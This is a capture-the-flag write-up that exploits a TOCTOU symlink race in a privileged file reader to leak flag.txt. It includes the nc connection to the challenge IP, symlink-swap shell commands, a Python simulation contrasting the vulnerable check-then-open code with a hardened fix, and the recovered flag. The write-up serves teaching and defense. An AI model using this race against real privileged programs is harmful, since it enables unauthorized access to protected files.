
the_asymptote

Challenge

Imported from local notes.md.

Solution

Original Notes

the_asymptote

Challenge Summary

  • Given: A remote service at nc 34.131.216.230 1338 with no downloadable files.
  • Goal: Recover the flag from the remote file reader.
  • Constraints: Flag format is IIITL{...}.

Initial Recon / Triage

  • Observations: Connecting to the service drops the user into a shell-like environment containing challenge, flag.txt, and welcome.txt.
  • File identification: challenge is executable but not readable by ctf. flag.txt is group-readable only by flag_group. The working directory itself is writable by ctf, so files in it (including welcome.txt) can be deleted and replaced.
  • Entry points: The challenge program always reads welcome.txt and prints it.

Hypotheses & Approach

  • Hypothesis 1: challenge might accept a filename as an argument. Testing showed it ignores argv and still reads welcome.txt.
  • Hypothesis 2: The binary performs a permission check and then opens welcome.txt, making it vulnerable to a symlink-swap race. This was correct.

Execution Steps (Reproducible)

Stage 1

Commands:

nc 34.131.216.230 1338
ls -l
./challenge

Results:

  • The shell exposes:
    • challenge
    • flag.txt
    • welcome.txt
  • Running ./challenge prints the contents of welcome.txt.

Stage 2

Commands:

rm -f welcome.txt && ln -s flag.txt welcome.txt
./challenge

rm -f welcome.txt && ln -s welcome.bak welcome.txt
./challenge

Results:

  • Pointing welcome.txt at flag.txt is refused with: Security Alert: You don't have permission to read welcome.txt
  • Pointing welcome.txt at a readable file succeeds.
  • So the binary checks the permissions of whatever welcome.txt resolves to and only then opens the path; because the check and the open resolve the name separately, this is a time-of-check/time-of-use (TOCTOU) bug on the path target.
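To make the bug in Stage 2 concrete, here is an added Python simulation (not the challenge binary and not part of the original notes) of the reader's check-then-open pattern next to a hardened version. The policy, file names, modes and the placeholder flag are all constructed for the demonstration: the reader may only serve world-readable regular files, while the process itself, like the binary running with flag_group rights, can open anything. A hook stands in for the race window so the swap is deterministic instead of depending on timing.

```python
import os
import stat
import tempfile

# Constructed simulation of the challenge's file reader. Policy: serve a
# regular file only if it is world-readable (what ctf could read anyway).
# The process itself can open every file, like the privileged binary.


def vulnerable_read(path, between_check_and_open=lambda: None):
    """Check the path, then open the path: the TOCTOU pattern from the notes."""
    st = os.stat(path)  # follows symlinks, so it inspects the current target
    if not (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IROTH):
        raise PermissionError(f"Security Alert: You don't have permission to read {path}")
    between_check_and_open()  # the race window; a writable directory lets the link change here
    with open(path, "rb") as f:  # the name is resolved a second time
        return f.read()


def hardened_read(path):
    """Open first (refusing symlinks), then decide on the descriptor.

    Whatever the name points to afterwards is irrelevant: the descriptor is
    bound to the inode that fstat() inspects, so there is nothing left to race.
    """
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)  # ELOOP on a symlink
    except OSError as exc:
        raise PermissionError(f"Security Alert: refusing {path}: {exc.strerror}") from None
    try:
        st = os.fstat(fd)  # properties of the object actually opened
        if not (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IROTH):
            raise PermissionError(f"Security Alert: You don't have permission to read {path}")
        return os.read(fd, 4096)
    finally:
        os.close(fd)


def demo():
    """Build a constructed directory like the challenge's and run both readers.

    Returns (vulnerable result, hardened result on the symlink, hardened result
    on the regular file); a result is the bytes read or the string 'denied'.
    """
    with tempfile.TemporaryDirectory() as d:
        flag = os.path.join(d, "flag.txt")
        bak = os.path.join(d, "welcome.bak")
        welcome = os.path.join(d, "welcome.txt")
        with open(flag, "w") as f:
            f.write("IIITL{constructed_placeholder_flag}\n")  # constructed, not the real flag
        os.chmod(flag, 0o640)  # group-readable only, like the real flag.txt
        with open(bak, "w") as f:
            f.write("welcome\n")
        os.chmod(bak, 0o644)
        os.symlink(bak, welcome)  # welcome.txt -> welcome.bak passes the check

        def swap_to_flag():
            os.remove(welcome)
            os.symlink(flag, welcome)  # the swap that happens inside the window

        results = []
        for call in (
            lambda: vulnerable_read(welcome, between_check_and_open=swap_to_flag),
            lambda: hardened_read(welcome),  # still a symlink to flag.txt now
            lambda: hardened_read(bak),  # a plain readable file is served normally
        ):
            try:
                results.append(call())
            except PermissionError:
                results.append("denied")
        return tuple(results)


if __name__ == "__main__":
    print(demo())
```

The vulnerable reader passes the check on welcome.bak and then hands out flag.txt, which is exactly the outcome the Stage 3 loop waits for; the hardened reader never consults the path name after opening, so the same swap only produces a refusal. Refusing symlinks with O_NOFOLLOW is the simplest fix for a reader that expects a regular file; a reader that must follow links should instead drop to the caller's privileges before opening.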

Stage 3

Commands:

python3 /root/incognito2026CTF/the_asymptote/artifacts/exploit.py

Results:

  • exploit.py connects to the remote shell.
  • It preserves the original welcome.txt as welcome.bak.
  • It starts a tight background loop that flips welcome.txt between welcome.bak and flag.txt.
  • It repeatedly runs ./challenge until the permission check passes on the readable file and the subsequent open lands on flag.txt.
  • The successful output contains the flag: IIITL{4cc355_ch3ck_p4553d_bu7_f1l3_5w4pp3d_07b404a5c3f2}

Artifacts Produced

  • artifacts/exploit.py - final remote exploit script.
  • artifacts/solve.py - simple wrapper to run the exploit as the standard solver entry point.
  • artifacts/exploit_output.txt - captured transcript of the successful exploit run.

Flag

IIITL{4cc355_ch3ck_p4553d_bu7_f1l3_5w4pp3d_07b404a5c3f2}